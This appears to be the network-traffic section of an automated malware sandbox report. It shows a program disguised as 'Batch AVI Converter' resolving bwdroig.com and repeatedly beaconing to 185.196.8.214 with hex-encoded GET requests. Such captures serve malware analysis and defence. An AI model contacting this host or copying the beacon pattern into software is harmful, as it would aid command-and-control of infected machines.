                                                            Sep 11, 2024 21:06:51.678004026 CEST8049748185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:51.678111076 CEST4974880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:51.678214073 CEST8049747185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:51.678250074 CEST4974880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:51.678284883 CEST4974780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:51.683343887 CEST8049748185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:52.389520884 CEST8049748185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:52.389622927 CEST4974880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:52.500276089 CEST4974880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:52.500590086 CEST4974980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:52.506561995 CEST8049749185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:52.506768942 CEST4974980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:52.506906033 CEST8049748185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:52.506973028 CEST4974880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:52.507091045 CEST4974980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:52.513401985 CEST8049749185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:53.198771000 CEST8049749185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:53.198865891 CEST4974980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:53.313535929 CEST4974980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:53.320374012 CEST8049749185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:53.551271915 CEST8049749185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:53.551402092 CEST4974980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:53.672430038 CEST4974980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:53.672684908 CEST4975080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:53.679513931 CEST8049750185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:53.679630995 CEST4975080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:53.679774046 CEST8049749185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:53.679820061 CEST4975080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:53.679852962 CEST4974980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:53.687700033 CEST8049750185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:54.402709961 CEST8049750185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:54.402867079 CEST4975080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:54.516405106 CEST4975080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:54.522037983 CEST8049750185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:54.763495922 CEST8049750185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:54.765377998 CEST4975080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:54.875363111 CEST4975080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:54.875706911 CEST4975180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:54.881906986 CEST8049751185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:54.883115053 CEST8049750185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:54.883241892 CEST4975180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:54.883244038 CEST4975080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:54.883301020 CEST4975180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:54.888654947 CEST8049751185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:55.585000038 CEST8049751185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:55.585127115 CEST4975180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:55.703573942 CEST4975180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:55.703955889 CEST4975280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:55.708825111 CEST8049751185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:55.708928108 CEST4975180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:55.708945990 CEST8049752185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:55.709098101 CEST4975280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:55.709333897 CEST4975280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:55.715092897 CEST8049752185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:56.428320885 CEST8049752185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:56.428400993 CEST4975280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:56.546107054 CEST4975280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:56.546531916 CEST4975380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:56.551608086 CEST8049753185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:56.551640987 CEST8049752185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:56.551721096 CEST4975380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:56.551776886 CEST4975280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:56.551981926 CEST4975380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:56.556827068 CEST8049753185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:57.264182091 CEST8049753185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:57.264250040 CEST4975380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:57.374233961 CEST4975380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:57.374561071 CEST4975480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:57.380995989 CEST8049753185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:57.381103992 CEST4975380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:57.381206989 CEST8049754185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:57.381304026 CEST4975480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:57.381532907 CEST4975480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:57.387672901 CEST8049754185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:58.076077938 CEST8049754185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:58.076172113 CEST4975480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:58.201898098 CEST4975480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:58.202302933 CEST4975580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:58.207300901 CEST8049755185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:58.207381964 CEST4975580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:58.207561970 CEST4975580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:58.207698107 CEST8049754185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:58.207758904 CEST4975480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:58.213093996 CEST8049755185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:58.906440973 CEST8049755185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:58.906526089 CEST4975580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:59.032954931 CEST4975580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:59.033211946 CEST4975680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:59.038235903 CEST8049755185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:59.038310051 CEST4975580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:59.038404942 CEST8049756185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:59.038475990 CEST4975680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:59.039778948 CEST4975680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:59.044691086 CEST8049756185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:59.848431110 CEST8049756185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:59.848505974 CEST4975680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:59.970154047 CEST4975680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:59.970546961 CEST4975780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:59.976022959 CEST8049756185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:59.976098061 CEST4975680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:59.976975918 CEST8049757185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:59.977058887 CEST4975780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:59.977205992 CEST4975780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:59.984276056 CEST8049757185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:00.991636038 CEST8049757185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:00.991707087 CEST4975780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:01.110663891 CEST4975780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:01.110976934 CEST4975880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:01.115948915 CEST8049758185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:01.116035938 CEST4975880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:01.116122961 CEST8049757185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:01.116132975 CEST4975880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:01.119431019 CEST4975780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:01.121829033 CEST8049758185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:01.839601040 CEST8049758185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:01.839736938 CEST4975880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:01.969942093 CEST4975880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:01.970593929 CEST4975980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:01.975440979 CEST8049758185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:01.975526094 CEST8049759185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:01.975536108 CEST4975880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:01.975600958 CEST4975980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:01.975826025 CEST4975980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:01.980670929 CEST8049759185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:02.669235945 CEST8049759185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:02.669331074 CEST4975980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:02.782531977 CEST4975980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:02.785303116 CEST4976080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:02.789170980 CEST8049759185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:02.789259911 CEST4975980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:02.790237904 CEST8049760185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:02.790374994 CEST4976080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:02.790514946 CEST4976080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:02.795607090 CEST8049760185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:03.550364971 CEST8049760185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:03.550461054 CEST4976080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:03.672693014 CEST4976180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:03.672703981 CEST4976080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:03.677751064 CEST8049761185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:03.677982092 CEST8049760185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:03.678131104 CEST4976180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:03.678138018 CEST4976080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:03.678267002 CEST4976180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:03.683125019 CEST8049761185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:04.444044113 CEST8049761185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:04.444123030 CEST4976180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:04.567822933 CEST4976180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:04.568221092 CEST4976280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:04.574045897 CEST8049762185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:04.574114084 CEST4976280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:04.574444056 CEST8049761185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:04.574506044 CEST4976180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:04.598109961 CEST4976280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:04.603146076 CEST8049762185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:05.338042974 CEST8049762185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:05.339435101 CEST4976280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:05.454503059 CEST4976380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:05.454509020 CEST4976280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:05.459683895 CEST8049763185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:05.459789991 CEST4976380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:05.459860086 CEST8049762185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:05.459992886 CEST4976380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:05.460181952 CEST4976280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:05.465070009 CEST8049763185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:06.175821066 CEST8049763185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:06.175895929 CEST4976380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:06.297672987 CEST4976380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:06.298034906 CEST4976480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:06.303905010 CEST8049763185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:06.303927898 CEST8049764185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:06.304008007 CEST4976480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:06.304009914 CEST4976380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:06.304177999 CEST4976480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:06.309101105 CEST8049764185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:07.003262997 CEST8049764185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:07.004268885 CEST4976480192.168.2.5185.196.8.214
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 11, 2024 21:05:21.409257889 CEST | 53 | 51590 | 1.1.1.1 | 192.168.2.5
Sep 11, 2024 21:05:55.585160017 CEST | 61370 | 53 | 192.168.2.5 | 141.98.234.31
Sep 11, 2024 21:05:55.823065996 CEST | 53 | 61370 | 141.98.234.31 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 11, 2024 21:05:55.585160017 CEST | 192.168.2.5 | 141.98.234.31 | 0xef2 | Standard query (0) | bwdroig.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 11, 2024 21:05:55.823065996 CEST | 141.98.234.31 | 192.168.2.5 | 0xef2 | No error (0) | bwdroig.com | | 185.196.8.214 | A (IP address) | IN (0x0001) | false

• bwdroig.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49694 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:05:55.897671938 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
    Host: bwdroig.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:05:56.592645884 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Wed, 11 Sep 2024 19:05:56 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Sep 11, 2024 21:05:56.702069044 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
    Host: bwdroig.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:05:56.945528984 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Wed, 11 Sep 2024 19:05:56 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            1 | 192.168.2.5 | 49695 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 11, 2024 21:05:57.067815065 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:05:57.758820057 CEST | 220 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:05:57 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            2 | 192.168.2.5 | 49696 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 11, 2024 21:05:57.880429029 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:05:58.587096930 CEST | 220 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:05:58 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            3 | 192.168.2.5 | 49698 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 11, 2024 21:05:58.707561016 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:05:59.436620951 CEST | 220 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:05:59 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:05:59.545393944 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:05:59.808842897 CEST | 220 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:05:59 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:05:59.920454025 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:00.172555923 CEST | 220 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:00 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            4 | 192.168.2.5 | 49699 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 11, 2024 21:06:00.301341057 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:04.025146961 CEST | 220 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:03 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            5 | 192.168.2.5 | 49700 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 11, 2024 21:06:04.145266056 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:04.856555939 CEST | 220 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:04 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:04.967935085 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:05.212599993 CEST | 220 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:05 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            6 | 192.168.2.5 | 49701 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 11, 2024 21:06:05.333175898 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:06.172828913 CEST | 220 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:05 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            7 | 192.168.2.5 | 49705 | 185.196.8.214 | 80 | |
                                                            Timestamp | Bytes transferred | Direction | Data
